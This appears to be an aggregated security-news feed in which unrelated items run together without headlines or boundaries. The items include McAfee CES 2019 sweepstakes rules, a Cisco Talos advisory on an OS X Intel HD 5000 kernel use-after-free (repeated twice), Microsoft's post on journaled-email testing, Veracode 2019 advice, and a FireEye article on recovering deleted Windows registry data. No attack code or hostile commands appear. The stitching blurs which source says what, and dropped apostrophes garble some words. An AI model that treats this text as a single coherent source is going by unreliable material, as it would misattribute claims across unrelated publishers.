No purchase necessary. A purchase will not increase your chances of winning. McAfee CES 2019 #RT2Win Sweepstakes will be conducted from January 8, 2019 through January 11, 2019. All entries for each day of the McAfee CES 2019 #RT2Win Sweepstakes must be received during the time allotted for the McAfee CES 2019 #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee CES 2019 #RT2Win Sweepstakes, duration is as follows:
- Begins: Tuesday, January 8, 2019 at 8:00 a.m. PST
- Ends: Friday, January 11, 2019 at 11:59 p.m. PST
- Two  winners will be announced: Monday, January 14, 2019
For the McAfee CES 2019 #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee CES 2019 #RT2Win Sweepstakes:
- Follow @McAfee_Home on Twitter.
- Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #McAfeeAtCES, #RT2Win and #Sweepstakes.
- Retweet the sweepstakes tweet of the day and make sure it includes the #McAfeeAtCES, #RT2Win, and hashtags.
- Note: Tweets that do not contain the #McAfeeAtCES, #RT2Win, and #Sweepstakes hashtags will not be considered for entry.
- Limit one entry per person.
Two  winners will be chosen for the McAfee CES 2019 #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included #McAfeeAtCES, #RT2Win and #Sweepstakes. McAfee and the McAfee social team will choose winners from all the viable entries. The winners will be announced and privately messaged on Monday, January 14, 2019 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes.
McAfee CES 2019 #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the McAfee CES 2019 #RT2Win Sweepstakes begins and live in a jurisdiction where this prize and McAfee CES 2019 #RT2Win Sweepstakes not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.
4. Winner Selection:
Winners will be selected at random from all eligible retweets received during the McAfee CES 2019 #RT2Win Sweepstakes drawing entry period. Sponsor will select the names of two  potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official McAfee CES 2019 #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.
5. Winner Notification:
Each winner will be notified via direct message (“DM”) on Twitter.com by January 14, 2019. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited, and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.
The prize for the McAfee CES 2019 #RT2Win Sweepstakes is a $500 Amazon gift card for each of the two  entrants/winners. Entrants agree that Sponsor has the sole right to determine the winners of the McAfee CES 2019 #RT2Win Sweepstakes and all matters or disputes arising from the McAfee CES 2019 #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.
Limit one (1) prize per person/household. Prizes are non-transferable, and no cash equivalent or substitution of prize is offered. The McAfee CES 2019 #RT2Win Sweepstakes has no affiliation with Amazon.
7. General Conditions:
Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee CES 2019 #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee CES 2019 #RT2Win Sweepstakes. entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee CES 2019 #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee CES 2019 #RT2Win Sweepstakes -related activity, or participation in the McAfee CES 2019 #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).
8. Limitations of Liability; Releases:
By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.
To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.
- To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
- Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list). As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.
9. Prize Forfeiture:
If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with the prize McAfee CES 2019 #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee CES 2019 #RT2Win Sweepstakes.
10. Dispute Resolution:
Entrants agree that Sponsor has the sole right to determine the winners of the McAfee CES 2019 #RT2Win Sweepstakes and all matters or disputes arising from the McAfee CES 2019 #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.
11. Governing Law & Disputes:
Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of the State of New York, U.S.A.
Personal information obtained in connection with this prize McAfee CES 2019 #RT2Win Sweepstakes will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html.
- Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after January 8, 2019 before January 11, 2019 to the address listed below, Attn: #RT2Win at CES Sweepstakes. To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Sarah Grayson. VT residents may omit return postage.
- Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2019 by McAfee, LLC. All rights reserved.
- Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
- Administrator: LEWIS Pulse, 111 Sutter St., Suiter 850, San Francisco, CA 94104
Tyler Bohan of Cisco Talos discovered this vulnerability.
Executive SummaryA memory corruption vulnerability exists in the IntelHD5000 kernel extension when dealing with graphics resources inside of Apple OSX 10.13.4. A library inserted into the VLC media application can cause an out-of-bounds access inside of the KEXT leading to a use after free and invalid memory access in the context of the kernel. This can be used for privilege escalation.
Apple supports multiple different GPU versions inside of OSX. With this functionality comes multiple different kernel extensions assigned to deal with the details of the interaction between user space and the kernel to get the graphics buffers drawn effectively. The provided GPU on the retina MacBook Pro is the Apple Intel HD 5000 processor. Therefore, this kernel extension is used in graphics rendering and processing throughout and is subject to a use-after-free privilege escalation vulnerability. The vulnerability is also reachable from inside the Safari sandbox creating a larger potential attack surface.
A brief look at Apple kernel extensions shows that it uses a restricted subset language and a unique way of communication between userspace and the kernel known as IOKit. Essentially, an IOKit extension inherits class from a UserClient and registers its own methods to handle user interaction. There are also various types that can be passed in to connect to different UserClients stored under the same umbrella name. Upon connection, a port is returned and this port is forwarded through in all further communications. In the proof of concept included, VLC is used to handle this basic connection and port setup.
For additional information, please see the advisory here.
IntelHD5000 use-after-free vulnerability (TALOS-2018-0615/CVE-2018-XXXX)
Apple supports multiple different GPU versions inside of OSX. With this functionality comes multiple different kernel extensions assigned to deal with the details of the interaction between userspace and the kernel to get the graphics buffers drawn effectively. The provided GPU on the retina MacBook Pro is the Apple Intel HD 5000 processor. This kernel extension is used in graphics rendering and processing throughout and is the subject to a use-after-free privilege escalation vulnerability. The vulnerability is also reachable from inside the Safari sandbox, creating a larger potential attack surface.
A brief look at Apple kernel extensions shows that it uses a restricted subset language and a unique way of communication between userspace and the kernel known as IOKit. Essentially, an IOKit extension inherits from a UserClient class and registers its own methods to handle user interaction. There are also various types that can be passed in to connect to different UserClients stored under the same umbrella name. Upon connection, a port is returned and this port is forwarded through in all further communications. In the proof of concept included, VLC is used to handle this basic connection and port setup.
For additional information, please see the advisory here.
Versions TestedOS X 10.13.4 - MacBookPro11.4
ConclusionAs this vulnerability can be triggered potentially via the Safari web browser, it’s always important for users to understand that impacted software, drivers and libraries are widely used throughout an operating system’s own ecosystem. Privilege escalations can allow an attacker to move from an untrusted user account to a trusted system account within the operating system, which can allow for administrative access and therefore allows adversaries to carry out malicious actions.
CoverageThe following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.
Snort Rules: 46858 - 46859
Adobe has released security updates to address vulnerabilities in Adobe Connect and Adobe Digital Editions. An attacker could exploit one of these vulnerabilities to take control of an affected system.
The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), encourages users and administrators to review Adobe Security Advisories APSB19-05 and APSB19-04, and apply the necessary updates.
Remote administration tools, or RATs, lurk in phishing emails and malicious downloads across the internet. Once installed, they give hackers almost complete control over an infected machine.
“Hackable?” host Geoff Siskind is always the hacked but in the latest episode, he gets to peek behind the curtain of a RAT attack and see just what hackers are able to do once they have remote access. Can they steal your files? See your webcam? Listen to your microphone?
Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this eye-opening episode.
The post Learn just what a hacker can do with remote RAT access appeared first on McAfee Blogs.
Recently, we shared details on how effectiveness is measured for Office 365 Exchange Online Protection (EOP) and Advanced Threat Protection (ATP). We also followed up with a comprehensive update on Office 365s improved ability to stop phishing emails from impacting users. These reports highlighted:
- Enhanced anti-phish capabilities for EOP/ATP.
- Visibility and transparency into our testing methods.
- Performance improvements from the engineering updates.
Today, well cover recent research on a testing methodologyemail journalingwhich is often used but can lead to misinterpreted results.
What is email journaling?
Email journaling (Figure 1) is when an organization enables recording of emails for retention or archiving. With growing regulatory requirements, organizations increasingly must maintain records of communications between employees performing daily business tasks. Journaling helps organizations respond to legal, regulatory, and organizational compliance requirements by recording inbound and outbound email communications. Exchange Online offers in-depth journaling capabilities. Microsoft provides extensive and up-to-date recommendations on how organizations can manage and configure journaling requirements.
Figure 1. Email journaling mail flow.
The effect of journaling on email security
Sometimes we receive inquiries from customers seeking guidance on whether journaled email can be used to measure the effectiveness of our security solution. Sometimes, third-party vendors use journaled emails to assess effectiveness; however, this can lead to inaccurate results because there is a:
- Misunderstanding of how the email security protection stack is built in Office 365.
- Mischaracterization of a miss versus a catch because of #1.
- Misinterpretation of data to customers based on #1 and #2.
In this scenario, third-party vendor(s) recommended customers create a journaling rule routing emails to the vendors testing cluster. The vendor(s) then evaluated the emails with their advanced filters to determine which emails Office 365 ATP missed. However, in Office 365, ATP protectionwhich includes Safe Attachments (file/URL detonation) and Safe Links (time-of-click protection)comes after the journaling rules. As a result, emails routed to a journaling archive have not yet been scanned by ATPs Safe Attachments or Safe Links policies (Figure 2). Our stack is designed so that journaling comes after the standard EOP anti-virus scansbut before ATP scansso known malicious emails are not archived. A potential best practice is to rescan emails released from an archive to help ensure they’re not malicious.
Figure 2. The top graphic shows the entire mail flow and security stack in EOP/ATP, while the bottom graphic is a blowup of the section that shows where the journaling rule takes effect and how it is before our Safe Attachments/URL sandboxing policy, which is part of Office 365 ATP.
Helping ensure our customers’ security
When journaled mail is used to measure effectiveness, its important to remember that the emails are not scanned by ATPsince journaling happens before ATP. Figure 3 shows how measuring journaled emails for effectiveness can cause a misinterpreted analysis because most emails thought to have been missed were in fact blocked by ATP and how a large percentage of emails not detected by ATP were false positives.
Figure 3. The emails which were characterized as misses never went through the ATP filters. When we ran them through ATP, we found ATP blocked most of the emails and also did not block many emails that were false positives.
There have been situations where customers were advised by third parties to use journaled emails to identify emails missed by Office 365 ATP, which is impossible due to the architecture of Office 365s mail flow. As with any service, Office 365 ATP also misses some emails. No service is 100 percent secure, but the best services are able to enhance and evolve quickly to address emerging threats. This ability to quickly enhance our services is one of our strengths and is manifest in the rapid evolution of Office 365 ATP into the optimal security service for Office 365.
Flipping the script
Interestingly, customers often provide us with email samples already scanned by a third-party vendor’s advanced filters to determine how Office ATP would perform on the same set of emails. Figure 4 shows the unique catch of ATP versus a third-party vendor in one such inquiry. In that inquiry, Office 365 ATP found 18 times more unique malicious emails than the third-party vendor. Also, with phishing being a predominate form of attack, we saw that the third-party vendor missed several hundred phishing emails.
Figure 4. Office 365 ATPs unique catch rate is 18 times greater than a third-party vendor, from a recent comparison of data shared with Microsoft by a customer.
How do I know which data to trust?
We dont look for gaps in third-party services unless a customer asks us to investigate. Our focus is on enhancing our service to help provide maximum security for our customers. We dont claim to catch everything; however, we are confident that no other service will secure you better in Office 365 than Office 365 ATP. Put us to the test with a trial. We have previously suggested that bifurcating real mail flow will provide a side-by-side analysis on effectiveness. This is the most powerful and informative test.
Begin an Office 365 E5 trial today to experience best-in-class security for your Office 365 environment and contact your rep to help you test us against any competitor. The results will serve as the ultimate validation that Office 365 ATP provides the best security for your Office 365 environment.
The post Be careful of data without context: The case of malware scanning of journaled emails appeared first on Microsoft Secure.
With Comcast supplying data to its customers through its broadband services and gateways, it’s now getting into the business of data protection: The Xfinity xFi Advanced Security is a $5.99/month service that Comcast will launch this quarter to protect any connected device in a customer’s home.
While companies like BitDefender manufacture devices like the BitDefender Box to shield home devices from external hacks, Comcast plans to use hardware that the customer may already own. Comcast said at the CES 2019 show in Las Vegas that it’s tying Xfinity xFi Advanced Security to its existing xFi Gateway, which is already in 15 million homes.
5 technologies that will change networking in 2019
More RSS Feed: newsroom.cisco.com/rss-feeds ...
Nine security tips for 2019
More RSS Feed: newsroom.cisco.com/rss-feeds ...
With January upon us, there’s undoubtedly a buzz in the air as security and development professionals eagerly plan out their 2019 strategies. You might be wondering what resolutions you can make that will help you navigate the New Year, and to take it a step further, what trends you should consider when crafting these resolutions. To help you get started, here are some suggestions from the Veracode team that will help you get a sense of what to expect in 2019 and have you on your way to a successful and secure year.
Sarah Gibson – Senior Application Security Consultant
Get your security and development teams collaborating and on the same page.
Good code is secure code, and having security help to design and build secure applications in a collaborative process allows for applications to be built better and faster. DevSecOps is a way to make that happen, and adopting a more automated and integrated approach between your security and development teams can make shipping secure code easier, with fewer last minute surprises.
Mark Curphey – Vice President of Strategy
Prepare for a boom in open source code use, and understand how to secure it.
Open source is now mainstream. We’re seeing it used in banking, autonomous cars, space travel, and even missiles, but as the community and commercial models for open source evolve, we’ll see a new realization that while you may get the code for free, you don’t always get security for free. How people continue to embrace open source code in light of that is still yet to be seen, but if you don’t want to be tomorrow’s news headline, you should be prepared with a game-plan of how to secure those components.
Chris Wysopal – Chief Technology Officer and Co-Founder
Prepare for the shift to serverless code, and turn your focus towards continuous security.
As more and more code moves to serverless, where there is no host or even container to configure, patch, and secure, the only thing left for organizations to secure will be their own code.
Code is increasingly becoming third party in the form of open source components and publicly available PaaS/SaaS APIs, which requires a supply chain security approach. With open source components, the public security posture of the components is taken into consideration to ensure that the least vulnerable version of a component is used, or – if necessary – a more secure component is used that has similar functionality. Supply chain security around PaaS/SaaS APIs is more challenging, but we see these providers publishing third-party reviews of their unique code, which open source components they use, and the security posture of the PaaS/SaaS APIs they used. The supply chain is becoming more public and more nested.
This will all be happening over a highly distributed set of microservices and APIs. These microservices will be developed using a DevOps methodology that will require continuous security. Newly developed code will be analyzed for weaknesses as it is written, and additionally analyzed as it is stitched into other code, and again as the context gets wider until a whole application or microservice is analyzed with its accompanying supply chain of open source components and PaaS/SaaS APIs.
Weaknesses will be transmitted to developers early, and the developers will be able to use suggested remediations, which will be reinforced by automated testing.
Maria Loughlin – Vice President of Engineering
Resolve to do something new, but just as important, resolve to continuously improve what you already do well.
You’ve probably been investing in automation for many years – automation of your testing, monitoring, metrics, and CI/CD pipelines. So in 2019, resolve to double-down on your automation investment to enable even more efficiency and quality consistency. In Veracode’s most recent State of Software Security report, we found a strong correlation between teams who have adopted a frequent, automated scanning approach and faster fix time for flaws.
To complement automation, turn your focus towards continuous security across all aspects of your organization, transforming your teams’ cultural mindset as well as in your pipelines and processes. It’s not realistic to hire a security expert for each scrum, so instead, resolve to train current team members to become security champions. Leverage their voices to represent the security perspective in each and every story prioritization, grooming, and review, and don’t be afraid to pull in security experts where needed. A nice side-effect of this practice is that investing in training for your team is proven to improve retention – a happy developer who is growing their career will stay in your organization.
Paul Farrington – Director of Solutions Architecture, EMEA & APAC
Continue to secure your software to mitigate against threats and avoid higher GDPR fines in 2019.
We are almost guaranteed to see more mega-breaches in 2019. Some of these will be undetected right now at time of writing, and may have been taking place for a number of months or years. The Marriott breach is a prime example of how serious an issue this is for large businesses. GDPR fines for breaches disclosed in 2018 are likely to top anything we have seen before when they are imposed in 2019 – in order to avoid being affected, organizations will need to continue to secure their software to mitigate against threats.
Everything You Need to Know to Kick-off and Mature Your Application Security Program
Whether you’re looking to measure the success of your application security program or want to know more about how you can mature your program in 2019, our “Everything You Need to Know” guides have you covered. Kick-start your journey to an advanced AppSec approach in the coming year by checking out the following:
FireEye consultants frequently utilize Windows registry data when performing forensic analysis of computer networks as part of incident response and compromise assessment missions. This can be useful to discover malicious activity and to determine what data may have been stolen from a network. Many different types of data are present in the registry that can provide evidence of program execution, application settings, malware persistence, and other valuable artifacts.
Performing forensic analysis of past attacks can be particularly challenging. Advanced persistent threat actors will frequently utilize anti-forensic techniques to hide their tracks and make the jobs of incident responders more difficult. To provide our consultants with the best possible tools we revisited our existing registry forensic techniques and identified new ways to recover historical and deleted registry data. Our analysis focused on the following known sources of historical registry data:
- Registry transaction logs (.LOG)
- Transactional registry transaction logs (.TxR)
- Deleted entries in registry hives
- Backup system hives (REGBACK)
- Hives backed up with System Restore
Windows Registry Format
The Windows registry is stored in a collection of hive files. Hives are binary files containing a simple filesystem with a set of cells used to store keys, values, data, and related metadata. Registry hives are read and written in 4KB pages (also called bins).
Registry Transaction Logs (.LOG)
To maximize registry reliability, Windows can use transaction logs when performing writes to registry files. The logs act as journals that store data being written to the registry before it is written to hive files. Transaction logs are used when registry hives cannot directly be written due to locking or corruption.
Transaction logs are written to files in the same directory as their corresponding registry hives. They use the same filename as the hive with a .LOG extension. Windows may use multiple logs in which case .LOG1 and .LOG2 extensions will be used.
For more details about the transaction log format, see this GitHub page.
Registry transaction logs were first introduced in Windows 2000. In the original transaction log format data is always written at the start of the transaction log. A bitmap is used to indicate what pages are present in the log, and pages follow in order. Because the start of the file is frequently overwritten, it is very difficult to recover old data from these logs. Since different amounts of data will be written to the transaction log on each use, it is possible for old pages to remain in the file across multiple uses. However, the location of each page will have to be inferred by searching for similar pages in the current hive, and the probability of consistent data recovery is very small.
A new registry transaction log format was introduced with Windows 8.1. Although the new logs are used in the same fashion, they have a different format. The new logs work like a ring buffer where the oldest data in the log is overwritten by new data. Each entry in the new log format includes a sequence number as well as registry offset making it easy to determine the order of writes and where the pages were written. Because of the changed log format, data is overwritten much less frequently, and old transactions can often be recovered from these log files.
The amount of data that can be recovered depends on registry activity. A sampling of transaction logs from real world systems showed a range of recoverable data from a few days to a few weeks. Real world recoverability can vary considerably. Registry-heavy operations, such as Windows Update, can significantly reduce the recoverable range.
Although the new log format contains more recoverable information, turning a set of registry pages into useful data is quite tricky. First, it requires keeping track of all pages in the registry and determining what might have changed in a particular write. It also requires determining if that change resulted in something that is not present in later revisions of the hive to assess whether or not it contains unique data.
Our current approach for processing registry transaction files uses the following algorithm:
- Sort all writes by sequence number descending so that we process the most recent writes first.
- Perform allocated and unallocated cell parsing to find allocated and deleted entries.
- Compare entries against the original hive. Any entries that are not present are marked as deleted and logged.
Transaction Log Example
In this example we create a registry value under the Run key that starts malware.exe when the user logs in to the system.
Figure 1: A malicious actor creates a value in the Run key
At a later point in time the malware is removed from the system. The registry value is overwritten before being deleted.
Figure 2: The malicious value is overwritten and deleted
Although the deleted value still exists in the hive, existing forensic tools will not be able to recover the original data because it was overwritten.
Figure 3: The overwritten value is present in the registry hive
However, in this case the data is still present in the transaction log and can be recovered.
Figure 4: The transaction log contains the original value
Transactional Registry Transaction Logs (.TxR)
In addition to the transaction log journal there are also logs used by the transactional registry subsystem. Applications can utilize the transactional registry to perform compound registry operations atomically. This is most commonly used by application installers as it simplifies failed operation rollback.
Transactional registry logs use the Common Log File Sytstem (CLFS) format. The logs are stored to files of the form <hive><GUID>.TxR.<number>.regtrans-ms. For user hives these files are stored in the same directory as the hive and are cleared on user logout. However, for system hives logs are stored in %SystemRoot%\System32\config\TxR, and the logs are not automatically cleared. As a result, it is typically possible to recover historical data from system transactional logs.
The format of transactional logs is not well understood or documented. Microsoft has provided a general overview of CLFS logs and API.
With some experimentation we were able to determine the basic record format. We can identify records for registry key creation and deletion as well as registry value writes and deletes. The relevant key path, value name, data type, and data are present within log entries. See the appendix for transaction log record format details.
Although most data present in registry transaction logs is not particularly valuable for intrusion investigations, there are some cases where the data can prove useful. In particular, we found that scheduled task creation and deletion use registry transactions. By parsing registry transaction logs we were able to find evidence of attacker created scheduled tasks on live systems. This data was not available in any other location.
The task scheduler has been observed using transactional registry operations on Windows Vista through Windows 8.1; the task scheduler on Windows 10 does not exhibit this behavior. It is not known why Windows 10 behaves differently.
Transactional Registry Example
In this example we create a scheduled task. The scheduled task periodically runs malware.
Figure 5: Creating a scheduled task to run malware
Information about the scheduled task is stored to the registry.
Figure 6: A registry entry created by the task scheduler
Because the scheduled task was written to the registry using transacted registry operations, a copy of the data is available in the transactional registry transaction log. The data can remain in the log well after the scheduled task has been removed from the system.
Figure 7: The malicious scheduled task in the TxR log
Deleted Entry Recovery
In addition to transaction logs, we also examined methods for the recovery of deleted entries from registry hive files. We started with an in-depth analysis of some common techniques used by forensic tools today in the hopes of identifying a more accurate approach.
Deleted entry recovery requires parsing registry cells in hive files. This is relatively straightforward. FireEye has a number of tools that can read raw registry hive files and parse relevant keys, values, and data from cells. Recovering deleted data is more complex because some information is lost when elements are deleted. A more sophisticated approach is required to deal with the resulting ambiguity.
When parsing cells there is only one common field: the cell size. Some cell types contain magic number identifiers, which can help determine their type. However, other cell types, such as data and value lists, do not have identifiers; their types must be inferred by following references from other cells. Additionally, the size of data within a cell can differ from the cell size. Depending on the cell type it may be necessary to leverage information from referencing cells to determine the data size.
When a registry element is deleted its cells are marked as unallocated. Because the cells are not immediately overwritten, deleted elements can often be recovered from registry hives. However, unallocated cells may be coalesced with adjacent unallocated cells to maximize traversal efficiency. This makes deleted cell recovery more complex because cell sizes may be modified. As a result, original cell boundaries are not well defined and must be determined implicitly by examining cell contents.
Existing Approaches for Recovering Deleted Entries
A review of public literature and source code revealed existing methods for recovery of deleted elements from registry hive files. Variations of the following algorithm were commonly found:
- Search through all unallocated cells looking for deleted key cells.
- Find referenced deleted values from deleted keys.
- Search through all remaining unallocated cells looking for unreferenced deleted value cells.
- Find referenced data cells from all deleted values.
We implemented a similar algorithm to experiment with its efficacy. Although this simple algorithm was able to recover many deleted registry elements, it had a number of significant shortcomings. One major issue was the inability to validate any references from deleted cells. Because referenced cells may have already been overwritten or reused multiple times, our program frequently made mistakes in identifying values and data resulting in false positives and invalid output.
We also compared program output to popular registry forensic tools. Although our program produced much of the same output, it was evident that existing registry forensic tools were able to recover more data. In particular, existing tools were able to recover deleted elements from slack space of allocated cells that had not yet been overwritten.
Additionally, we found that orphaned allocated cells are also considered deleted. It is not known how unreferenced allocated cells could exist in a registry hive as all related cells should be unallocated simultaneously on deletion. It is possible that certain types of failures could result in deleted cells not becoming unallocated properly.
Through experimentation we discovered that existing registry tools were able to perform better validation resulting in fewer false positives. However, we also identified many cases where existing tools made incorrect deleted value associations and output invalid data. This likely occurs when cells are reused multiple times resulting in references that could appear valid if not carefully scrutinized.
A New Approach for Recovering Deleted Entries
Given the potential for improving our algorithm, we undertook a major redesign to recover deleted registry elements with maximum accuracy and efficiency. After many rounds of experimentation and refinement we ended up with a new algorithm that can accurately recover deleted registry elements while maximizing performance. This was achieved by discovering and keeping track of all cells in registry hives to perform better validation, by processing cell slack space, and by discovering orphaned keys and values. Testing results closely matched existing registry forensics tools but with better validation and fewer false positives.
The following is a summary of the improved algorithm:
- Perform basic parsing for all allocated and unallocated cells. Determine cell type and data size where possible.
all allocated cells and do the following:
- For allocated keys find referenced value lists, class names, and security records. Populate data size of referenced cells. Validate key ancestors to determine if the key has been orphaned.
- For allocated values find referenced data and populate data size.
- Define all allocated cell slack space as unallocated cells.
- Enumerate allocated keys and attempt to find deleted values present in the values list. Also attempt to find old deleted value references in the value list slack space.
- Enumerate unallocated cells and attempt to find deleted key cells.
- Enumerate unallocated keys and attempt to define referenced class names, security records, and values.
- Enumerate unallocated cells and attempt to find unreferenced deleted value cells.
- Enumerate unallocated values and attempt to find referenced data cells.
Deleted Recovery Example
The following example demonstrates how our deleted entry recovery algorithm can perform more accurate data recovery and avoid false positives. Figure 8 shows an example of a data recovery error by a popular registry forensics tool:
Figure 8: Incorrectly recovered registry data
Note that the ProviderName recovered from this key was jumbled because it referred to a location that had been overwritten. When our deleted registry recovery tool is run over the same hive, it recognizes that the data has been overwritten and does not output garbled text. The data_present field in Figure 9 with a value of 0 indicates that the deleted data could not be recovered from the hive.
Figure 9: Properly validated registry data
Windows includes a simple mechanism to backup system registry hives periodically. The hives are backed up with a scheduled task called RegIdleBackup, which is scheduled to run every 10 days by default. Backed up hives are stored to %SystemRoot%\System32\config\RegBack. Only the most recent backup is stored in this location. This can be useful for investigating recent activity on a system.
The RegIdleBackup feature was first included with Windows Vista. It is present in all versions of Windows since then, but it does not run by default on Windows 10 systems, and even when it is manually run no backups are created. It is not known why RegIdleBackup was removed from Windows 10.
In addition to RegBack, registry data is backed up with System Restore. By default, System Restore snapshots are created whenever software is installed or uninstalled, including Windows Updates. As a result, System Restore snapshots are usually created on at least a monthly basis if not more frequently. Although some advanced persistent threat groups have been known to manipulate System Restore snapshots, evidence of historical attacker activity can usually be found if a snapshot was taken at a time when the attacker was active. System Restore snapshots contain all registry hives including system and user hives.
Wikipedia has some good information about System Restore.
Processing hives in System Restore snapshots can be challenging as there may be many snapshots present on a system resulting in a large amount of data to be processed, and often there will only be minor changes in hives between snapshots. One strategy to handle the large number of snapshots is to build a structure representing the cells of the registry hive, then repeat the process for each snapshot. Anything not in the previous structure can be considered deleted and logged appropriately.
The registry can provide a wealth of data for a forensic investigator. With numerous sources of deleted and historical data, a more complete picture of attacker activity can be assembled during an investigation. As attackers continue to gain sophistication and improve their tradecraft, investigators will have to adapt to discover and defend against them.
Appendix - Transactional Registry Transaction Log (.TxR) Record Format
Registry transaction logs contain records with the following format:
Magic number (0x280000)
Record type (1)
Registry operation type
Key path size
Key path size repeated
The magic number is always 0x280000.
The record size includes the header.
The record type is always 1.
Operation type 1 is key creation.
Operation type 2 is key deletion.
Operation types 3-8 are value write or delete. It is not known what the different types signify.
The key path size is at offset 40 and repeated at offset 42. This is present for all registry operation types.
For registry key write and delete operations, the key path is at offset 72.
For registry value write and delete operations, the following data is present:
Value name size
Value name size repeated
The data for value records starts at offset 88. It contains the key path followed by the value name optionally followed by data. If data size is nonzero, the record is a value write operation; otherwise it is a value delete operation.
Subscribers to Queensland Early Warning Network told: "Your personal data is not safe"
The following are the 13 best antivirus tools for Android, according to AV-TEST’s November 2018 evaluations of 20 Android security apps. (The AV-TEST Institute is a Germany-based independent service provider of IT security and antivirus research.)
AV-TEST rates each tool for three areas: protection (six point max), usability (six points max) and features (one point max). Eight of the 13 Android antivirus software apps listed below received perfect protection and usability scores of 6.0. The other lost a half point on either the protection or usability scores. The apps are in alphabetical order.
With more than 300 million domain names registered globally, there are numerous examples of trending keywords reflected by domain name registrations. We have shown in the past that there is a correlation between domain name registrations and newsworthy and popular events, as well as anticipated trends.
Keeping in the spirit of the zeitgeist that .com and .net domain name registration trends can represent, Verisign publishes this monthly blog post series identifying the top 10 trending .com and .net keywords registered in English during the preceding month.
December 2018 TRENDING KEYWORDS
Here are the top 10 trending keywords registered in December 2018. Any surprises?
Click here to see other domain trends blog posts, and make sure you check back the second Tuesday of each month for the latest keyword registration trends in .com and .net. Better yet, subscribe to the Verisign blog to have the posts delivered directly to your inbox.
